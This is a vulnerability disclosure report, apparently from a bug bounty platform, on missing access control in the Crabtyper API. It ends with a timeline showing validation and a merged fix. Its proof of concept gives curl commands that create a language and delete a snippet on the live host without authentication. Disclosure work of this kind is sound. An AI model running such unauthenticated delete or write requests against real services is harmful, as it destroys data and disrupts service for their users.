Improper Access Control in Crabtyper API in brancobruyneel/crabtyper

Valid

Reported on

Jun 16th 2022


Description

The API program allows any user to create languages and snippets, as well as delete them. This allows a malicious actor to add offensive snippets which could appear to any user, and also allows anyone to completely take down the service by removing all snippets.

This is due to insufficient access control being implemented in the API.

Proof of Concept

Create a language:

$ curl -X POST -H "Content-Type: application/json" https://crabtyper-api.azurewebsites.net/api/languages -d "{\"name\":\"example\"}"

Delete a snippet:

$ curl -X DELETE https://crabtyper-api.azurewebsites.net/api/snippets/4a917fe1-ed65-4134-b8de-423023970ac9

These are just two examples, snippets can also be created in a similar way.

Impact

This vulnerability is capable of displaying arbitrary text data to all users and preventing the service from operating by deleting all snippets.

We are processing your report and will contact the brancobruyneel/crabtyper team within 24 hours. 9 days ago
William
9 days ago

Researcher


Update: looks like someone has already exploited this - needs to be fixed ASAP!

We created a GitHub Issue asking the maintainers to create a SECURITY.md 8 days ago
We have contacted a member of the brancobruyneel/crabtyper team and are waiting to hear back 8 days ago
brancobruyneel validated this vulnerability 7 days ago
William Henderson has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
brancobruyneel confirmed that a fix has been merged on 5022f4 7 days ago
The fix bounty has been dropped
to join this conversation